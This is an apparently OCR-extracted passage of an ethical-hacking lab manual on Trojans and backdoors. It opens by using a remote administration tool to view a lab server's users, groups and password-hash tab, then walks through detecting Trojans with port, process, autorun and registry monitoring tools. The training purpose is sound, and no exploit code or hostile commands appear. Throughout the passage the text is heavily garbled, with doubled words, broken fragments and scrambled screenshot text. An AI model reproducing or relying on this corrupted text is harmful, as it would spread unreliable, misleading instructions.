C o n n e ct ct

]Request ]Request ajthoriratxx

#16.28.24 #16.28.24 Initializing, pleas e wait... #16:28:25 Connected to 10.0.0.13

Password

D i sc sc o n n ec ec t @ Oear on on iscome ct

kBytesIn: 251.64

Connect onCXjr aton: 6 Minutes, 18Seconds.

FIGURE 6.8: Information of the remote computer

13. Select Users and Groups, which will display the complete user details. 10.0.0.13 10.0.0.13 :AWR C PRO 9.3.9 9.3.9 File

Jools

Desktop

j

Users Users

' :

"

Help Syslnf o

^ Groups Groups

NetworkJnfo \

Ffe System

Use's anc Groups

I Chat

Passwor Password d Haîes

User Information for Administrator User Account. Administrator Administrator Passw ord Age 7 days 21 hours 21 21 minutes 33 seconds Privilege Level: Administrator Comment Built-in account for administering the computer/domain computer/domain Flags: Logon script executed. Normal Account. Full Name: Workstations can log from: no restrictions Last Logon: 9/20/2012 3:58:24 AM Last Logoff: Unknown Account expires Never expires Use r ID (RID) 500 Pnmary Global Group (RID): (RID): 513 SID S 1 5 21 1858180243 1858180243 3007315151 3007315151 1600596200 500 Domain WIN-EGBHISG14L0 No SubAuthorties 5

Remote Host

User Name

[administrator

10.0.0.13

W C o n ne ne c t

nf

D Request Request ajthon:at> ajthon:at>or or

kByle* 111: 256 .00

^

D is is c on on n ec ec t

Password

Progress Report

#16:28:24 Initializing, please wait... #16:28:25 Connected to 10.0.0.13

@ Oear on on iscome ct Cumeuiimi3u1atu< 1 : e Minutes, 26Seconds.





rs

10.0.0.13: 10.0.0.13: AWRC PRO9.3.9 O9.3. 9

file

Iools

Help

Desktop

Syslnf o

Netwo rtJnf o

We System

Use's and Groups

Chat

\ | Grou Groups ps ~ |y Passwoid Ha«hes

Groups:

Names Administrators Backup Backup Operator Operator Certifi Certificat cate e Service Service DC Crypto Cryptograp graphic hic Oserat Oserat Distributed Distributed COM Use s Event Event Log Log Readers Readers G ue ue sstts

SID S-1-5-32-544 S-1-5-32-544 (Typo Ali as/Do S-1-5 S-1-5-3 -322-55 551 1 (Ty (Type pe Alia Alias/Do s/Do S-1-6S-1-6-3232-674 674 (Typ (Type e Alias/Do . S-1-5S-1-5-3232-569 569 (Typ (Type e Alias/Do Alias/Do

Comment Administrators have have complete and unrestricted Backup Backup Oper Operato ators rs can over overri ride de secur security ity restri restrict ct Members Members of this this group group are allowed l owed to connect connect t« Members Members are are author authorized ized to perfo perform rm crypto cryptogra graph ph

S-1-5-32-5 S-1-5-32-562 62 (Ty (Type pe Alias/Do . 5-1-55-1-5-3232-573 573 (Typ (Type e Alias/Do... Alias/Do... S-1-5-32-546 (Type Al Ali as as //D Do

Members are allowed to launch. aunch. actKate and us Members Members of this this group group can read read eve event nt logs from from Gu es es ttss ha have the sa same ac ac ce ce ss ss as as me members of oft

III

<1

_____I

Global Groups:

S- 1-5-21-1858180243 1-5-21-1858180243-3007315... -3007315... Ordinary users

Progress Report |administrator

^ c f

Connect Conn ect ]Requ ]Request est ajthonrabor ajthonrabor

kBytesIn: 257.54

Disconn Disconnect ect

Password

#16.28.24 #16.28.24 Initializing, pleas e wait... #16:28:25 Connected to 10.0.0.13

@ dear on iscomect

Connection Connection Ouraton: ?Minutes, 34Seconds. 34Seconds.



14. 14. Tins tool will display all all the details details o f the rem ote system. system. 15. Analyze the results of the remote computer.

Lab An alysis alysis Analyze and document tlie results related to die lab exercise. Give your opinion on your target’s security posture and exposure dirough public and tree information.





To ol/Utility ol/Utility

Information Information Co llected/Objecti llected/Objectives ves Achieve Achieved d Remotely accessing Windows Server 2008 Re sult: Syste System m information of remote Windows Server 2008

Atelier Web Remote Commander

N etw et w or k In Info fo rm atio at ionn P ath at h rem re m ote ot e W ind ow s Server Serv er 2008 viewing complete tiles tiles of c: \ of remote Windows Server 2008 User and Groups details of remote Windows Server 2008 Password hashes

Questions 1. Evaluate die ports that A\\”RC A\\”RC uses to perfo perform rm operations. 2. Determ ine whe ther it is possible to launch AWRC from fro m the com mand man d line line and make a connection. I f ves, ves, dien illustrate illustrate how it can be done. Internet Connection R equired □ Y es

0 No





Detecting Trojans A Trojan is aprogram that that contains malicious or harm harmfful code inside apparently harmless pr programming or dat data in such a > raj that that canget control and and cause damage, such as mining the file file al allocation table on a ha hard drive. ICON

KEY

Lab Scenario

Valuable f~'/ f~'/ Valuable

Most individuals are confused about the possible ways to remove a Trojan virus from a specific system. One must realize that the World Wide Web is one of the tools that transmits information as well as malicious and harmful viruses. A . ■'* Test your ____ ____ knowledge ______ back ba ckdo do or Troj Tr ojan an can be extrem extr emely ely harm ha rmfu full if no t dealt dea lt w ith app approp ropriate riately. ly. The Th e main function of tins type of virus is to create a backdoor 111 order to access a Web exercise ^ specific system. With a backdoor Trojan attack, a concerned user is unaware m Wor Workb kbook ook revi review ew about the possible effects until sensitive and important information is found missing from a system. With a backdoor Trojan attack, a hacker can also pe rf rfor or m othe ot he r types o t maliciou mali ciouss attacks attac ks as well. Th e othe ot he r name na me fo forr back ba ckdo do or Trojans is remote access Trojans. The main reason that backdoor Trojans are so dangerous is that they hold the ability to access a particular machine remotely (source: http://www.combofix.org http://www.combofix.org). ). information

You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft o f valuab valuable le data from the network, and identity theft. theft.

Lab Objectives The objective objective of tins lab lab is to to help students learn to detect Tro jan and b ackdoor attacks. The objectives objectives o f the lab mclude: mclude: & T o o ls demonstrated in this lab are available in D:\CEHTools\CEHv 8 Module 06 Trojans and Backdoors


•

Analyze Analyze

using Po rt Mo nitor

•

Analyze Analyze

using Process M onitor

•

Analyze

using Registry M onitor

•

Analyze Analyze using Startup Program Mo nitor

•

Create MD 5 hash tiles tiles for Window s directory files files



Lab Environment To carry out this, you need: need:

Tcpview, located at D:\CEH-Tools\CEHv 8 Module 06 Trojans and Backdoors\Port Monitoring Tools\TCPView

Autoruns, located at D:\CEH-Tools\CEHv 8 Module 06 Trojans and Ba ckd oors\P rocess Monito Monitori ring ng Tools\Autoruns Tools\Autoruns

PrcView, located at C:\CEH-Tools\CEHv7 Module 06 Trojans and Ba ckd oors\P rocess Monit Monitor or Tool\Prc Tool\Prc View Jv16 power tool, located at D:\CEH-Tools\CEHv 8 Module 06 Trojans and Backdoors\Registry Monitoring Tools\jv16 Power Tools 2012 FsumFrontEnd. located at D:\CEH-Tools\CEHv 8 Module 06 Trojans and Backdoors\Files and Folder Integrity Checker\Fsum Frontend

■

Window Server 200 8 (host) A compu ter running Window

& Disabling Disabling and Deleting Deleting Entries

■

Windows Server 200 3 running 111 Yutual Machine

If you don't want an entry to active die nest time you boot or login you can either either disable or delete it. To disable an entry uncheck it. Autoruns will store die startup information in a backup backup location location so diat it can reactivate die entry when you recheck it. For items stored in startup folders Autoruns creates a subfolder named Aiitoruns disabled. Check a disabled item to re-enable it

■ If you decide decide to download the the latest v ersion, then screenshots shown 111 the lab might differ ■

You need a web brow ser to access Inte rne t

■

Administrative Admin istrative privileges to ru runn tools


Ov erview of Trojans Trojans and and Backdoors A Trojan is a program diat contains malicious or harmful code inside apparently harmless programming or data 111 such a way that it can get control and cause damage, such as ruining die lile allocation table on a hard drive. Note: The versions of the created client or host and appearance may differ from

what it is 111 the lab, but the actual process of connecting to the server and accessing the processes is same as shown 111 tins lab. m . T A S K

1

Tcpview

Lab Task Task s 1. G o to Windows Server 2012 Virtual Machine. 2. Install Tcpview from the location D:\CEH-Tools\CEHv 8 Module 06 Trojans and Backdoors\Port Monitoring Tools\TCPView.

3. The TCPYiew TCP Yiew main window wind ow appears, with details details such as Process, Process ID, Protocol, Local address. Local Port, Remote Address, and Remote Port.




TCPView - Sysinternals: www.sysinternals.com

File Options Process View H

03 Should delete items that you do not wish to ever execute. Do so by choosing Delete in the Entry menu menu.. Only die currendy selected item will be deleted.

a

h

Help

|

|| Process Process > C l dns.exe T7 dns.e dns.exe xe T 7 dns.exe T 7 dns.exe i - dns.exe I" 7 dns.exe i 7 dns.exe i" 7 dns.e dns.exe xe IF dns.e dns.exe xe » dns.exe 1 dns.exe » 1 dns.exe T 7 dns.exe r dns.e s.exe » dns.exe T dns.exe dns.exe r dns. dns.e exe dns.exe dns.exe 1 dn dns.exe 1 dn dns.exe T dns.exe • dns.exe • dns.exe

PID 1572 1572 1572 1572 1572 1572 1572 1572 1572 1572 1572 1572 1572 1572 1572 1572 1572 1572 1572 1572 1572 1572 1572 1572 1572

Protocol TCP TCP TCP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP

Local Address win-2n9stosgien WIN-2N WIN-2N9ST 9ST0SG 0SGL L WIN-2N9ST0SGL win-2n9stosgien WIN-2N9ST0SGL WIN-2N9ST0SGL WIN-2N9STOSGL WIN-2N9ST0SGL WIN-2N9STOSGL WIN-2N9STOSGL WIN-2N9ST0SGI.. WIN-2N9STOSGL WIN-2N9ST0SGL WIN-2N9STOSGI.. WIN-2N9STOSGL WIN-2N9STOSGL WIN-2N9ST0SGI.. WIN-2N9ST0SGI.. WIN-2N9ST0SGI.. WIN-2N9ST0SGI.. WIN-2N9ST0SGI.. WIN-2N9ST0SGL WIN-2N9STOSGL WIN-2N9STOSGI.. WIN-2N9STOSGL

Local Pott domain dom domain 49157 domain domain 49152 49153 49154 49155 49156 49157 49158 49159 49160 49161 49162 49163 49164 49165 49166 49167 49168 49169 49170 49171

w fl

V/l Wl

V

< r

1

>

II IIII

________ ____________ _____ _ ________ _____________ ______ _ ________ _____________ ______ _ ________ _____________ ______ _

U

_______ __________ _______ _______ ___

FIGURE 8.1: Tcpview Main window

tool perform port monitoring. TCPView - Sysinternals: www.sysinternals.com

-

1 File Options Process

y

G3 If you are running Autoruns without administrative privileges privileges on on Windows Vista and attempt to change die state of a global entry, you'll be denied access

a

View

I~ I □ f

X

Help

! @

Process ' E l svchoste svchostexe xe (O svchostexe E l svchost.exe E l svchost.e svchost.exe xe E l svchost.exe E sv s vchost.exe E svcho svchost.e st.exe xe E sv s vchost.exe E sv s vchost.exe 1' svchost.exe E svchost.exe 1' svchost.exe E svchost.exe [ □ sv svchost.exe E sv s vchost.exe E svchost.exe E svcho svchoste stexe xe E svcho svchost.e st.exe xe T7 System 1 System System • 1 System • ' System 7 System T 7 System System • 1 System System

PID 385G 892 960 1552 2184 3440 4312 4272 1808 1552 1552 9G0 1552 3092 960 960 1064 960 4

4 4 4 4 4 4 III

Protocol TCP TCP TCP TCP TCP TCP TCP TCP TCP UDP UDP UDP UDP UDP UDP UDP UDP UDP TCP TCP TCP TCP TCP TCP TCP

Local Address WIN-2N9ST0SGI.. WIN-2N9STOSGI.. WIN-2N9STOSGL WIN-2N9STOSGL WIN-2N9ST0SGL WIN-2N9STOSGI.. WIN-2N9ST0SGI.. WIN-2N9STOSGL WIN-2N9ST0SGI.. win-2n9stosgien win-2n9stosgien WIN-2N9ST0SGI... win-2n9stosgien WIN-2N9STOSGL WIN-2N9ST0SGL WIN-2N9ST0SGI... WIN-2N9STOSGI.. win-2n9stosgien win-2n9stosgien win-2n9stosgien win-2n9stosgien WIN-2N9STOSGI... WIN-2N9STOSGI... WIN-2N9STOSGI... WIN-2N9STOSGI...

n

|Local Port 5504 49153 49154 49159 49161 49163 49168 49169 49187 bootps bootpc isakmp 2535 3391 teredo ipsec-msft llmnr 53441 netbios-ssn microsoft-ds microsoft-ds http https microsoft-ds 5985

1R^ Wl Wl Wl Wl Wl Wl Wl Wl Wl

* *

Wl wir wit Wl Wl Wl Wl v >

FIGURE 8.2: Tcpview Main window

5. No w it is analyzing analyzing die SMTP and odier ports. ports.




TCPView - Sysinternals: www.sysinternals.com File

y & Autoruns will will displa display ya dialog with a button that enables you to re-launch Autoruns with administrative rights. You can also use the -e command-line option to launch initially launch Autoruns with administrative rights

Cl There are several ways to get more information about an autorun location or entry. To view a location or entry in Explorer or Regedit chose Jump To in the En try menu or double-click on the entry or location's line in the display

Options

Process

View

Help

a

“rotocol CP CP CP CP CP CP CP CP CP CP DP DP DP DP DP DP DP DP DP CP CP CP CP CP CP <

Local Address WIN-2N9ST0SGL WIN-2N9ST0SGL WIN-2N9ST0SGL WIN-2N9ST0SGL WIN-2N9ST0SGL WIN-2N9ST0SGL WIN-2N9ST0SGL WIN-2N9ST0SGL WIN-2N9ST0SGL WIN-2N9ST0SGL win-2n9stosgien win-2n9stosgien WIN-2N9ST0SGL win-2n9stosgien WIN-2N9ST0SGL WIN-2N9 WIN-2N9ST0 ST0SGL SGL WIN-2N9STOSGL WIN-2N9ST0SGL win-2n9stosgien win-2n9stosgien win-2n9slosgien wirv2n9$tosgien WIN-2N9ST0SGL WIN-2N9ST0SGL WIN-2 IN-2N9 N9ST ST0S 0SG GL

Local Port 3388 5504 49153 49154 49159 49161 49183 49168 49169 49187 bootps bootpc isakmp 2535 3391 tere teredo do ipsecmsft lmnr 53441 netbios-ssn microsoft-ds microsoft-ds http https microsoft-d ft-dss

Remote Address WIN-2N9ST0SGL WIN-2N9ST0SGL WIN-2N9ST0SGL WIN-2N9ST0SGI.. WIN-2N9ST0SGI.. WIN-2N9ST0SGI.. WIN-2N9ST0SGI.. WIN-2N9ST0SGI.. WIN-2N9ST0SGI.. WIN-2N9ST0SGI..

x

Remote Pott 0 0 0 0 0 0 0 0 0 0 *

Stat LIST LIST LIST LIST LIST LIST LIST LIST LIST LIST

* * * * WIN-2N9ST0SGL 0 win-egbhisgl 41 410 49158 windows8 49481 WIN-2N9ST0SGI.. 0 WIN-2N9ST0SGI.. 0 WIN-2 IN-2N N9ST0SGI.. I.. 0 .

LIST EST, EST, LIST LIST LIST

III

FIGURE 8.3: Tcpview analyzing ports

You can also kill kill die process by double-clickuig double-clickuig diat respective process, and dien clicking die End Process button. butt on. Prope rties for dns.exe: dns.exe: 1572 |

Domain Name System (DNS) Server Microsoft Corporation Corporation

Version:

G.02.8400.0000

Path: C:\Windows\System32\dns.exe End Process OK

FIGURE 8.4: Killing Processes 1m

TASK

2

Autoruns

Go to Windows Server 2012 Virtual Virtual Machine. Machine. Double-click Autoruns.exe, which is located at D:\CEH-Tools\CEHv 8 Module Module 06 Trojans and B ack doo rs\Pr ocess Monito Monitorin ring g Tools\Autoruns. Tools\Autoruns.

It lists all processes. DLLs, and services.




Autoruns [WIN-2N9STOSGIEN\Administrator] Sysinternals: www.sysinter.J ~

O

File

Entry

Options

HijacksImage3

User

|ExecuteBoot 3 |Codecs

&

1f t Winso ck Provtders ]

O

Everything Everything

Help

Logon

|

Print Monitors Monitors | < Explorer Explorer |

t j j LSA Providers Providers |

&

£

Internet Explorer Explorer | J

Scheduled Tasks |

Autorun Entry Description Description Publisher Publisher \CurrentVers 10n\Winl 0g0nl'AppS etup }jf HKLM\SOFTWARE\Microsof t\Wind ow$ N T\CurrentVers

O You can view Explorer's Explorer's file properties dialog for an entry's image file by choosing Properties in die Entry menu. You can also have Autoruns automatically automatically execute an Internet search in your browser by selecting Search Online in the Entry menu.

0

, $► Applnit

Network Providers Providers | 9 .

g ] UsrLogon UsrLogon cmd

|

,V

Know KnownD nDLLs LLs

|

A

Sidebar Sidebar Gadgets Gadgets

Services |

Drivers Drivers

Image Path Path c:\windows\syste c:\windows\system32 m32\usrlo.. \usrlo....

H KLM \S 0 FTWAR FTWAR E\M croscr ft\Wndows\CurrentVers10n\R un 0

[■13HotKeysCmds

hkcmd Module

Intel Corporation Corporation

0

£ 3 IgfxT ray

igfxTray Module


c:\windows\system32\igfxtr...

0

[ ■1


c:\windows\sys tem32\igfxp...

$

Persistence

persistence Module

c: \windo ws\sy stem32\hkc...

H KLM KLM \S 0 FTWARE\W0w64 32N ode\M icr osott\Wmdows\CurrentVersion\R un un E

Adobe ARM

0

[■1 Adobe Reader Reader

0

Adobe Reader Reader and Acrobat. .. Adobe Systems Systems Incorporated c: \program files (x86)Vcomm... Adobe Acrobat Acrobat SpeedLaun.. SpeedLaun.. Adobe Syste Systems ms Incorporate Incorporated d c:\program c:\program file files s (x (x 86)\adob

EPS0N_UD_S.. EPS0N_UD_S.. EPSON EPSON USB USB Displa Display y VI

r a r \

. .

^

. T

40

SEIKO EPSON EPSON CORPORA.. c:\program files (x86)\epso... ^

.

Ready

.

™

.

Windows Entries Entries Hidden. Hidden.

FIGURE 8.5: Automns Main Window & Simply Simply run Autoruns and it shows you die currendy configured autostart applications in the locations that most direcdy execute applications. applications. Perform a new scan that reflects changes to options by refreshing refreshing die display display

1 °-

following is the detailed list on die Logon tab. O

Autoruns [WIN-2N9STOSGIEN\Administrator] - Sysinternals: www.sysinter...L

I File

Entry

Option s

User

d is is ) ^ 1 X ^ H

Code Codecs cs

|

P

Boot Boot Exec Execute ute

fc* Winsock Provide Providers rs

!3

Everything |

0

[i j]

0 0

Logon

^ Explorer

lil

4$

|

Know KnownD nDLLs LLs

Network Network Provide Providers rs |

'1 Scheduled Tasks |

|

^

Winlo Winlogon gon

Sidebar Gadge Gadgets ts Services

^

Drivers Drivers

Image Path Path

Intel Intel Corpora Corporation

c:\windom\syst em32\hkc...


c:\windows\system32\igfxtr

Intel Intel Corpora Corporation

c:\windows\system3 c:\windows\system32\igfxp 2\igfxp .

Adobe Reader Reader and Acrobat. .

Adobe ARM

Adobe Reader...

£

Publisher Publisher

persisten persistence ce Module Module

E3

[j ) Appln Applnit it

Internet Explorer Explorer

Persisten Persistence ce

0

|

LSA Provide Providers

igfxT ray Module

0

9

Image Image Hjacks Hjacks

HotKey HotKeysC sCmds mds hkcmd Module Module

S

0

^

Description Description

lafxT lafxTra rav v

0

|

Print Monitors Monitors

Autorun Entry

CQ Internet Explorer This entry shows Browser Helper Objects (BHO's), Internet Explorer toolbars and extensions

Help

Adobe Systems Systems Incorporated

Adobe Acrobat SpeedLa SpeedLaun... un...

c:\program files (x86 )\comm..

Adobe Syste Systems ms Incorporate Incorporated d

c:\prog 1am files (x86)\adob..

EPS0 N_UD _S. EPSON EPSON USB USB Display Display V I. 40

SEIKO EPSON CORPORA... CORPORA... c:\pr ogram files (x86)\epso.

Google

0 fH

googletalk

Google Tak

SurvlavaUpdat JavalT M) Update Scheduler Scheduler

c:\program files (x86)Vgoogl. Sun Microsystems, Microsystems, Inc.c:\program files |x86 )Vcomm

t S C:\ProgramDa C:\ProgramDala\Microsoft\W la\Microsoft\Windows\Start indows\Start Menu\P Menu\Progca rogcams\S ms\Startup tartup

Ready

Windows Entries Entries Hidden

FIGURE 8.9: Autonuis Logon list

11 11.. The Th e following are die Explorer list details.


Ethical Ha ckin g and Coun termea sures Copyiight Copyiight © by EC-Counci EC-Councill All Rights Reserved. Reproduct ion is Stricdy Proliibited.

Wriogon


Autoruns [WIN-2N9STOSGIEN\Administrator] Sysinternals: www.sysinter...L

O

File

Entry

| Codecs Codecs

|

3

User

Z? Eve Everyth rything ing | ^

Help

Boot Boot Execute Execute

Winsock Providers |

& Services All Windows

services configured to start automatically when the system boots.

Options

|

3

Image Image Hâcks Hâcks

1* Print Monitors

Logon[ Logon[

Autorun Entry

,j

Explor xplorer er

|

£

|

'■> Applnit Applnit

LSA Providers | Internet Explorer Explorer | J

Desciiption

|

'

KnownDLL KnownDLLs s

]

Network Providers | Scheduled Tasks |

A

W nbg on

Sidebar Gadgets Services |

Drivers Drivers

Image Path

Publisher Publisher

H KLM \S 0 FTWAR FTWAR E\Classes\Proto cois\F*er 0

^ te xt /x m l

Microso Microsoft ft OfficeXML MIME... MIME... Microso Microsoft ft Corpora Corporation

c:\pr 0gramfiles\c 0fnm0n f i . .

•iff HKLM \S oftware\ Class es\x\S heC xVContextM enuHandlers 0

^

SnagltMainSh .. Snagit Shell Shell Extension Extension DLL

0

fo

WinRAR WinRAR shel extension extension

TechSmith TechSmith Corporation Corporation c:\program files (x86 )\techs..

Alexander Roshal

c:\prog ramfil es\winrar\r are.

H KLM \S 0ftware\W0w6432N ode\Clas ses\x\S helE x\ContextM x\ContextM enuH andlers

0

SnagltMainSh .

0

*V

Snagit Snagit Shell Shell Extension Extension DLL

WinRAR32

TechSmith TechSmith Corporation Corporation

c:\program files (x86 )\techs..

WinRAR shel extension Alexande Alexanderr Roshal Roshal

c:\programfiles\winrar\rare. c:\programfiles\winrar\ra re.

H KLM \S oftware\Cla sses\D irectory\S helE xSContextM enuH andlers andlers

0

SnagltMainSh

Snagit Snagit Shell Shell Extension Extension DLL

TechSmith Corporation

Ready

c:\p rogr am files (x8S)\techs.

Windows Entries Entries Hidden.

FIGURE 8.10: Autonins Explorer list

12 12.. The Th e following are die Services list details. Autoruns [WIN-2N9STOSGIEN\Administrator] - Sysinternals: www.sysinter...L

O

File

Entry

Options

User

Help

*J & & B X * H

(33 Drivers This displays all kernel-mode drivers registered on the system except those that are disabled

Code Codecs cs

|

I Boot Boot Execute Execute

fc?; Win soc k Providers O

Ever Everyth ything ing | ^

|

&

Logon Logon |

Autorun Entry

]

3

Image hijacks hijacks

Print Monitors Monitors Explow T

|

[ jl Applnit Applnit

LSA Provide Providers i

Interne Internett Explor xplorer er


£

|

KnownD KnownDLLs LLs

Network Provide Providers rs 1

Schedule Scheduled d Tasks Tasks |

Publisher

|

^

Wintogo Wintogon n

Sidebar Sidebar Gadoets Gadoets Service Services s

Drivers rivers

Image Path

HKLM\System\CurrentControlSet\Services HKLM\System\CurrentControlSet\Se rvices

g

T his service keeps keeps you Ad... Adobe Systems Systems Incorporated Incorporated c: \windows\syswow64\ma

0

[ 1 AdobeFlashPta AdobeFlashPta

0

[■1 c2wts

Service to convert convert claims claims b .. Microsoft Corporation

0

0

EPSO EPSON N USB USB Displa isplay y VI 40

EMPJJDSA EMPJJDSA

c:\program filesNwindo filesNwindows ws id ..

SEIKO EPSON EPSON CORPO RA.. c:\program files (x86)\epso...

0

F I M02illaMainten... illaMainten... The Mozi a Maintenance S. . Mozila Foundation Foundation

c:\program files (x86J\m02i ...

0

0o se

Saves Savesinsta instalati lationfi onfiles lesuse used d .. Microsoft Corporation

c:\program files (x86)\comm

0

F I osoosvc osoosvc

Office Software Software Protection... Protection... Microsoft Corporation

c:\program files\common fi

0

H

WSusCe WSusCertServe rtServerr This This service manage manages s the c... Microsoft Corporation

c:\program filesVupdate ser

Ready


FIGURE 8.11: Autoruns Services list

13 13.. The Th e following are die Drivers list details.




O


File

Entry

3

Options

User

Imag Image e Hâcks cks

|ExecuteBoot ! 3 |Codecs H

&

ft Winsock Providers Providers [

O

£9 Scheduled Tasks Task scheduler tasks configured to start at boot or logon

Everything Everything |

Help

Print Monroes Monroes |

$

Logon | . < Explorer Explorer | ^

Autorun Entry


[

LSA Providers Providers*

|

£

Internet Explorer Explorer | J

Network Providers |

Scheduled Tasks |

Publisher

, $ Applnit

Sidebar Gadgets Services

Dnvers Dnvers

Image Path

HKLM\System\CurrentControlSet\Services ^

3ware

S) adp94xx( adpahci ^

| LSI 3ware SCSI Storpoct Driver}SI

c: \windows\system32\drrve.

Adaptec Windows SAS/SA... Ad aptec jnc .

c:\w indows \system32\dr1ve stem32\dr1ve..

Adaptec Windows SATA S t.. Adaptec, Inc.

c: \ windo ws\system32\drive.

Adaptec StorPort Ultr a320... Ad aptec jnc .

c: \ window$\system32\dnve window$\system32\dnve..

,amdsata 4

AH D 1.2 Device Driver

c: \ windo ws\system32\dnve.

amdsbs ^

AM D T echnology AH Cl Co... AM D T echnologies Inc.

adpu320

amdxata ^

Storage torage Filter Filter Driver

arcsas &

Advanced Micro Devices Adv ancedMi cro D evices

c: \ windo ws\system32\drive. ws\system32\drive. c: \ windo w$\system32\drive. w$\system32\drive.

Adaptec RAID Storpoc Storpoctt Driver PMC-Sierra, PMC-Sierra, Inc. Inc.

c: \ windowsSsy stem32\drrve. stem32\drrve.

Adaptec SAS RAID WS 03 ... PMC-SierraJnc. PMC-SierraJnc.

c:\window$\system32\drrve.

Ready

Windows Entries Entries Hidden.

FIGURE 8.12: Autoruns Drivers list.

14 14.. Tlie following fo llowing is die KnownDLLs list 111 Antonins. O


File

Entry

Options

User

Help

d j) & B X * I?• Winsock Provide Providers rs | O

Ever/hing E ve ve ry ry t hi hi n

Q

Code Codecs cs

^

^

Logon L og og on on | Q

Print Print Monitors Monitors | ^ Explore Explorer ]

Boot Boot Execute Execute |

Autorun Entry


&

LSA Provide Providers rs | I nt nt er er ne net Ex pl pl or or er er ] J

f" ^ Image Image Hijacks Hijacks |

f

Network Network Provide Providers rs | 9• S ch ch ed ed ul ul ed ed Tas ks ks 1

[ j| Applnit Applnit

\ KnownDLLs

Publisher Publisher

Sidebar Sidebar Gadge Gadgets ts

S er er vi vi ce ces [

j

Dr iv iv er er s Winlogon

Image Path Path

ij T HKLM \System\CurrentControlS ystem\CurrentControlS et\Controf\S ession ession Manager\KnownDlls

0

13

_W0w6 4

File not not found: C:\Wndows...

0 1

W ow 64c pu

found: C:\Wndow s. File not found:

0 ■

Wow64win

File not found: C:\Wndow s...

Ready


FIGURE 8.13: Autoruas Known DLL’s list.

ool s 111 Windows Server 2012 15 15.. Install and launch jv1 6 Po we rT ools 2012 (host machine). T A S K

4

16. 16. jvl6 Power P ower Tool is located at D:\CEH-Tools\CEHv 8 Module 06 Trojans Jv16 Power Tool Tool

and Backdoors\Registry Monitoring Tools\jv16 Power Tools 2012.

17. To launch jv1 6 Po werT we rToo ools, ls, select die Start menu by hovering die mouse cursor on die lower-lef lower-leftt corner ot die desktop.



|

, V KnownDLLs

|

A


u

Unilb Rnta

€ (tarn aP Phut T..

3 Windows Serve Serverr 2012 2012 Wirdowt Server 2012 Rocate Cancxfatr Caucrnt . fcvaluator copy. Eud *40.

.. . * J L J L .

1 FIGURE 7.1 7.1:: Windows Server 2012 2012 Start-Desktop

18. Click jv 16 P ow er T oo ls 2 0 1 2 111 Start menu apps. Administrator A

Start

03 Winlogon Noti fica tion s Shows Shows DLLs DLLs that register for Winlogon notification of logon events

FIGURE 7.2: Windows Server 2012 Start Menu Apps

19. 19. Click the Clean and fix my computer icon.

C] Winsock Providers Shows Shows registered Winsock protocols, including including Winsock service providers. Malware Malware often installs itself it self as a Winsock service provider because because there are are few tools diat can remove them. Autoruns can uninstall them, but cannot disable them




P 1 E*e

Language Language

jvl 6 Powe PowerT rToo ools ls 2012 2012

O

K

lo ok

Help

r

Trad LrnMDon n Effect - 60 days left

Live Support: Onlne

Handbook Handbook not avadaWe

Home

Registry Tools

^ File Tools i

Fully remove software and leftovers

Speed up my computer

Immunize my computer

Verif y my downloads are safe to an

System Tools

Privacy Tools

—

Backups

Control which programs start automabcaly

Acton Hstory

L U JSettings Trial Reminder

■

92<*>

Registry Health 9SV0

PCHealth jv l6 PowerT PowerTools ools (2.1.0.1173) runnng runnng on Datacenter Datacenter Edition Edition (x64) (x64) with 7.9 GB of RAM RAM [10:29:45 T ip] : Your system has has now been analyzed. analyzed. The health score of your computer ts 95 out of 100 and and the health score of yo ir Wndows re gstr y 6 92 out o f 100. I f you scored under under 100 you can improve improve!! the ratings by usrtg the Oean and Fa My Computer tool.

FIGURE 8.2 8.20: 0: jvl6 jvl 6 Home page. page.

20. Tlie Clean and fix my computer dialog box appears. Click the Settings tab and then click click die Start button. butt on. jv l 6 PowerTo ols 2012 [W8-x6 4] - Clean and fix my co mp ute r

□

Settings

Additional safety

#

Additional options

*

L i 10

Search words

Ignore words words

Settings

A

Emphasi Emphasize ze safety over both scan speed speed and the number of found errors.

Emphasi Emphasize ze the number o f found errors and speed over s afety and accuracy. accuracy.

Selected setting :

H


Normal system scan scan policy: all Window s-related data is skipped for additional safety. Only old temp files are listed. listed.

Cancel


(3S LSA Providers Provi ders Shows Shows registers Local Security Authority (LSA) authentication, notification and security packages


FIGURE 8.21: jvl6 Clean and fix my computer dialogue.

21. It will analyze analyze you yourr system for tiles; tiles; this will will take a few minutes. 1-1 jv16 PowerTools 2012 2012 [W8-x64] File

Select

Tools

-

I Px

Clean and fix my computer!

Help

[ Analyzing your computer. This can take a few mmutes. mmutes. Please wait...

Abort

Printer Monitor Drivers Displays DLLs that load into the print spooling service. Malware has used this support to autostart itself

FIGURE 8.22: jvl6 Clean and fix my computer Analyzing.

22. Comp Co mpute uterr items items will be listed after die complete com plete analysis analysis.. iv16 PowerTools 2012 rW8-x641

LJ You can save die results of a scan with File->Save and load a saved scan widi File->Load. These These commands work with native Autoruns file formats, but you can use File->Export to save a text-only version of the scan results. You can also automate the generation of native Autoruns export files with command line options

File

Select

Tools

-

!

Clean and fix mv comDuter!

r

x

Help

Item Severity Description Tags Item

/

Seventy

Descrpbon

Tags

.....................

! 3 R e g i s t r y E rro rs

7

! I ^

7

I n v a l i d f i le le o r d i r e c to to r y r e fe fe r e n c e

I ] c ) R e g is try ju n k

266

J O b s o l e t e s o f t w a re e n t ry Usele ss empty key

146

♦ J U s e le s s fi le e x te n s io n

116

|~1 |~1

^

4

+J Start menu and desktop items

I

23

-

II

Delete

dose

Selected: Selected: 0, highlighted : 0, total: 296

FIGURE 8.24: jvl6 Clean and fix my computer Items details.

23. Selected item details details are as follows.

LJ Sidebar Displays Displays Windows sidebar gadgets




jv16 PowerTools 2012 2012 [W8-x64] - Clean and and fix my com puter File

Select

Tools

Help

Item Seventy Description Tags It em

/

Seventy

Descryton

Tags A

13 Registry Errors

7

13

7

I n v a l i d t i l e o r d i re c t o r y r e f e r e n c e HKCRUnstal l

:3 %

1HKCRUnstal ^

HKLM HKLM\so \softw ftw< <

13%

Fie or directory directory X :

=

FJe or directory X :

_ ] H KL M \s ot tw ;^ B □

HKLM HKLM\SO \SOFT FT\/ \/

13%

File or directory X :

□

HKLM HKLM\S \SOF OFT\ T\ll

13%

Fie or directory directory X :

_ | HKLM\S0ttwi

